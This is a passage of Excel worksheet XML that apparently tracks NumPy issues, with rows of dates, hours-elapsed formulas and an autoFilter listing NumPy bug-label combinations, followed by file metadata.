      <c r="G2198" t="s">
        <v>118</v>
      </c>
      <c r="H2198" t="str">
        <f>TEXT(F2198-E2198,"[h]")</f>
        <v>8347</v>
      </c>
    </row>
    <row r="2199" spans="1:8" hidden="1">
      <c r="A2199" t="s">
        <v>748</v>
      </c>
      <c r="B2199">
        <v>10509</v>
      </c>
      <c r="C2199" t="s">
        <v>749</v>
      </c>
      <c r="D2199" t="s">
        <v>7</v>
      </c>
      <c r="E2199" s="1">
        <v>43133.389166666668</v>
      </c>
      <c r="F2199" s="1">
        <v>43134.720694444448</v>
      </c>
      <c r="G2199" t="s">
        <v>28</v>
      </c>
      <c r="H2199" t="str">
        <f>TEXT(F2199-E2199,"[h]")</f>
        <v>31</v>
      </c>
    </row>
    <row r="2200" spans="1:8">
      <c r="A2200" t="s">
        <v>750</v>
      </c>
      <c r="B2200">
        <v>10508</v>
      </c>
      <c r="C2200" t="s">
        <v>751</v>
      </c>
      <c r="D2200" t="s">
        <v>7</v>
      </c>
      <c r="E2200" s="1">
        <v>43133.31658564815</v>
      </c>
      <c r="F2200" s="1">
        <v>43133.916967592595</v>
      </c>
      <c r="G2200" t="s">
        <v>160</v>
      </c>
      <c r="H2200" t="str">
        <f>TEXT(F2200-E2200,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="2201" spans="1:8" hidden="1">
      <c r="A2201" t="s">
        <v>752</v>
      </c>
      <c r="B2201">
        <v>10507</v>
      </c>
      <c r="C2201" t="s">
        <v>753</v>
      </c>
      <c r="D2201" t="s">
        <v>7</v>
      </c>
      <c r="E2201" s="1">
        <v>43133.258206018516</v>
      </c>
      <c r="F2201" s="1">
        <v>43133.3905787037</v>
      </c>
      <c r="G2201" t="s">
        <v>174</v>
      </c>
      <c r="H2201" t="str">
        <f>TEXT(F2201-E2201,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="2202" spans="1:8" hidden="1">
      <c r="A2202" t="s">
        <v>754</v>
      </c>
      <c r="B2202">
        <v>10506</v>
      </c>
      <c r="C2202" t="s">
        <v>755</v>
      </c>
      <c r="D2202" t="s">
        <v>7</v>
      </c>
      <c r="E2202" s="1">
        <v>43132.362222222226</v>
      </c>
      <c r="F2202" s="1">
        <v>43132.626215277778</v>
      </c>
      <c r="G2202" t="s">
        <v>60</v>
      </c>
      <c r="H2202" t="str">
        <f>TEXT(F2202-E2202,"[h]")</f>
        <v>6</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A2:H2202" xr:uid="{E35BC49D-AD47-4C16-9723-B01B0D4B8667}">
    <filterColumn colId="6">
      <filters>
        <filter val="['00 - Bug', '01 - Enhancement', '03 - Maintenance', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', '01 - Enhancement', '06 - Regression', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '01 - Enhancement', '08 - Backport', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '01 - Enhancement', '08 - Backport', 'component: numpy.datetime64']"/>
        <filter val="['00 - Bug', '01 - Enhancement', '56 - Needs Release Note.', '59 - Needs tests', 'component: numpy.polynomial']"/>
        <filter val="['00 - Bug', '01 - Enhancement', '56 - Needs Release Note.', 'component: numpy.ma']"/>
        <filter val="['00 - Bug', '01 - Enhancement', 'component: build', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '01 - Enhancement', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '01 - Enhancement', 'component: numpy.datetime64']"/>
        <filter val="['00 - Bug', '03 - Maintenance', '04 - Documentation', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '03 - Maintenance', '04 - Documentation', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', '03 - Maintenance', '05 - Testing', '08 - Backport', 'component: CI']"/>
        <filter val="['00 - Bug', '03 - Maintenance', '05 - Testing', 'component: CI']"/>
        <filter val="['00 - Bug', '03 - Maintenance', '05 - Testing']"/>
        <filter val="['00 - Bug', '03 - Maintenance', '08 - Backport', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '03 - Maintenance', '08 - Backport', 'component: numpy.f2py']"/>
        <filter val="['00 - Bug', '03 - Maintenance', '08 - Backport', 'component: numpy.random']"/>
        <filter val="['00 - Bug', '03 - Maintenance', '29 - Intel/Anaconda', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '03 - Maintenance', 'component: numpy.core', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', '03 - Maintenance', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '03 - Maintenance', 'component: numpy.f2py']"/>
        <filter val="['00 - Bug', '03 - Maintenance', 'component: numpy.fft']"/>
        <filter val="['00 - Bug', '03 - Maintenance', 'component: numpy.ma', 'component: numpy.testing']"/>
        <filter val="['00 - Bug', '03 - Maintenance', 'component: numpy.random']"/>
        <filter val="['00 - Bug', '03 - Maintenance', 'component: numpy.ufunc']"/>
        <filter val="['00 - Bug', '03 - Maintenance', 'Proposal', 'component: numpy.ufunc']"/>
        <filter val="['00 - Bug', '03 - Maintenance']"/>
        <filter val="['00 - Bug', '04 - Documentation', '06 - Regression', 'component: numpy.f2py']"/>
        <filter val="['00 - Bug', '04 - Documentation', '08 - Backport', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', '04 - Documentation', '08 - Backport']"/>
        <filter val="['00 - Bug', '04 - Documentation', 'component: build']"/>
        <filter val="['00 - Bug', '04 - Documentation', 'component: Documentation']"/>
        <filter val="['00 - Bug', '04 - Documentation', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '04 - Documentation', 'component: numpy.dtype']"/>
        <filter val="['00 - Bug', '04 - Documentation', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', '04 - Documentation']"/>
        <filter val="['00 - Bug', '05 - Testing', '08 - Backport', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', '05 - Testing', '08 - Backport']"/>
        <filter val="['00 - Bug', '05 - Testing', 'component: numpy.core', 'component: numpy.f2py']"/>
        <filter val="['00 - Bug', '05 - Testing', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '05 - Testing', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', '05 - Testing', 'good first issue']"/>
        <filter val="['00 - Bug', '05 - Testing']"/>
        <filter val="['00 - Bug', '06 - Regression', '08 - Backport', 'component: build', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '06 - Regression', '08 - Backport', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '06 - Regression', '08 - Backport', 'component: numpy.ctypes']"/>
        <filter val="['00 - Bug', '06 - Regression', '08 - Backport', 'component: numpy.distutils']"/>
        <filter val="['00 - Bug', '06 - Regression', '08 - Backport', 'component: numpy.f2py']"/>
        <filter val="['00 - Bug', '06 - Regression', '08 - Backport', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', '06 - Regression', '08 - Backport', 'component: numpy.ma']"/>
        <filter val="['00 - Bug', '06 - Regression', '09 - Backport-Candidate', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '06 - Regression', '09 - Backport-Candidate', 'component: numpy.distutils']"/>
        <filter val="['00 - Bug', '06 - Regression', '09 - Backport-Candidate', 'component: numpy.einsum']"/>
        <filter val="['00 - Bug', '06 - Regression', '09 - Backport-Candidate', 'component: numpy.random']"/>
        <filter val="['00 - Bug', '06 - Regression', '09 - Backport-Candidate', 'priority: high']"/>
        <filter val="['00 - Bug', '06 - Regression', '09 - Backport-Candidate']"/>
        <filter val="['00 - Bug', '06 - Regression', '26 - Compiler']"/>
        <filter val="['00 - Bug', '06 - Regression', 'component: build', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '06 - Regression', 'component: numpy.core', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', '06 - Regression', 'component: numpy.core', 'good first issue']"/>
        <filter val="['00 - Bug', '06 - Regression', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '06 - Regression', 'component: numpy.ctypes']"/>
        <filter val="['00 - Bug', '06 - Regression', 'component: numpy.distutils']"/>
        <filter val="['00 - Bug', '06 - Regression', 'component: numpy.einsum']"/>
        <filter val="['00 - Bug', '06 - Regression', 'component: numpy.f2py']"/>
        <filter val="['00 - Bug', '06 - Regression', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', '06 - Regression', 'component: numpy.linalg']"/>
        <filter val="['00 - Bug', '06 - Regression', 'component: numpy.ma', 'component: numpy.ufunc']"/>
        <filter val="['00 - Bug', '06 - Regression', 'component: numpy.ma']"/>
        <filter val="['00 - Bug', '06 - Regression', 'component: numpy.random']"/>
        <filter val="['00 - Bug', '06 - Regression', 'component: numpy.ufunc']"/>
        <filter val="['00 - Bug', '06 - Regression', 'priority: high']"/>
        <filter val="['00 - Bug', '06 - Regression']"/>
        <filter val="['00 - Bug', '07 - Deprecation', '08 - Backport']"/>
        <filter val="['00 - Bug', '07 - Deprecation', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '07 - Deprecation', 'component: numpy.dtype', 'defunct — difficulty: Intermediate']"/>
        <filter val="['00 - Bug', '07 - Deprecation']"/>
        <filter val="['00 - Bug', '08 - Backport', '24 - PyPy']"/>
        <filter val="['00 - Bug', '08 - Backport', '30 - API']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: __array_function__']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: build']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: distribution']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.core', 'component: numpy.dtype']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.ctypes']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.datetime64']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.distutils']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.dtype']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.f2py']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.fft']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.linalg']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.ma']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.polynomial']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.random']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.testing']"/>
        <filter val="['00 - Bug', '08 - Backport', 'component: numpy.ufunc']"/>
        <filter val="['00 - Bug', '08 - Backport']"/>
        <filter val="['00 - Bug', '09 - Backport-Candidate', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '09 - Backport-Candidate', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', '09 - Backport-Candidate']"/>
        <filter val="['00 - Bug', '15 - Discussion', 'component: Documentation', 'good first issue']"/>
        <filter val="['00 - Bug', '24 - PyPy', 'component: build']"/>
        <filter val="['00 - Bug', '24 - PyPy', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '24 - PyPy']"/>
        <filter val="['00 - Bug', '25 - WIP', '55 - Needs work', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '25 - WIP', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '26 - Compiler', '29 - Intel/Anaconda']"/>
        <filter val="['00 - Bug', '26 - Compiler', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '27 - Py3K', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '28 - Benchmark', 'component: numpy.ufunc']"/>
        <filter val="['00 - Bug', '29 - Intel/Anaconda', 'component: numpy.ufunc']"/>
        <filter val="['00 - Bug', '29 - Intel/Anaconda']"/>
        <filter val="['00 - Bug', '50 - Duplicate', '57 - Close?', 'component: numpy.dtype']"/>
        <filter val="['00 - Bug', '50 - Duplicate', 'component: numpy.distutils']"/>
        <filter val="['00 - Bug', '50 - Duplicate', 'component: numpy.linalg']"/>
        <filter val="['00 - Bug', '50 - Duplicate', 'component: numpy.ufunc']"/>
        <filter val="['00 - Bug', '50 - Duplicate']"/>
        <filter val="['00 - Bug', '53 - Invalid']"/>
        <filter val="['00 - Bug', '54 - Needs decision', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', '54 - Needs decision', 'component: numpy.random']"/>
        <filter val="['00 - Bug', '55 - Needs work', 'component: Other']"/>
        <filter val="['00 - Bug', '56 - Needs Release Note.', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', '57 - Close?', 'component: numpy.core']"/>
        <filter val="['00 - Bug', '57 - Close?', 'component: numpy.random']"/>
        <filter val="['00 - Bug', '58 - Ready for review', 'component: numpy.f2py']"/>
        <filter val="['00 - Bug', '59 - Needs tests', 'component: numpy.f2py']"/>
        <filter val="['00 - Bug', '59 - Needs tests', 'component: numpy.linalg']"/>
        <filter val="['00 - Bug', 'component: __array_function__']"/>
        <filter val="['00 - Bug', 'component: benchmarks', 'component: numpy.ufunc']"/>
        <filter val="['00 - Bug', 'component: benchmarks']"/>
        <filter val="['00 - Bug', 'component: build', 'component: distribution']"/>
        <filter val="['00 - Bug', 'component: build', 'component: numpy.core']"/>
        <filter val="['00 - Bug', 'component: build']"/>
        <filter val="['00 - Bug', 'component: distribution']"/>
        <filter val="['00 - Bug', 'component: Documentation', 'component: numpy.dtype']"/>
        <filter val="['00 - Bug', 'component: Documentation']"/>
        <filter val="['00 - Bug', 'component: NEP']"/>
        <filter val="['00 - Bug', 'component: npy_math']"/>
        <filter val="['00 - Bug', 'component: numpy.core', 'component: numpy.dtype']"/>
        <filter val="['00 - Bug', 'component: numpy.core', 'component: numpy.ufunc']"/>
        <filter val="['00 - Bug', 'component: numpy.core', 'good first issue']"/>
        <filter val="['00 - Bug', 'component: numpy.core']"/>
        <filter val="['00 - Bug', 'component: numpy.ctypes']"/>
        <filter val="['00 - Bug', 'component: numpy.datetime64']"/>
        <filter val="['00 - Bug', 'component: numpy.distutils']"/>
        <filter val="['00 - Bug', 'component: numpy.dtype']"/>
        <filter val="['00 - Bug', 'component: numpy.einsum']"/>
        <filter val="['00 - Bug', 'component: numpy.f2py']"/>
        <filter val="['00 - Bug', 'component: numpy.fft']"/>
        <filter val="['00 - Bug', 'component: numpy.lib.financial']"/>
        <filter val="['00 - Bug', 'component: numpy.lib']"/>
        <filter val="['00 - Bug', 'component: numpy.linalg']"/>
        <filter val="['00 - Bug', 'component: numpy.ma']"/>
        <filter val="['00 - Bug', 'component: numpy.matrixlib']"/>
        <filter val="['00 - Bug', 'component: numpy.polynomial']"/>
        <filter val="['00 - Bug', 'component: numpy.random', 'priority: high']"/>
        <filter val="['00 - Bug', 'component: numpy.random']"/>
        <filter val="['00 - Bug', 'component: numpy.testing']"/>
        <filter val="['00 - Bug', 'component: numpy.ufunc']"/>
        <filter val="['00 - Bug', 'component: swig']"/>
        <filter val="['00 - Bug', 'defunct — difficulty: Intermediate']"/>
        <filter val="['00 - Bug', 'good first issue']"/>
        <filter val="['00 - Bug', 'priority: high']"/>
        <filter val="['00 - Bug']"/>
      </filters>
    </filterColumn>
    <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A3:H2202">
      <sortCondition descending="1" ref="B2:B2202"/>
    </sortState>
  </autoFilter>
  <phoneticPr fontId="1"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18646</dc:creator>
  <cp:lastModifiedBy>18646</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:17:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-24T02:46:06Z</dcterms:modified>
</cp:coreProperties>
</file>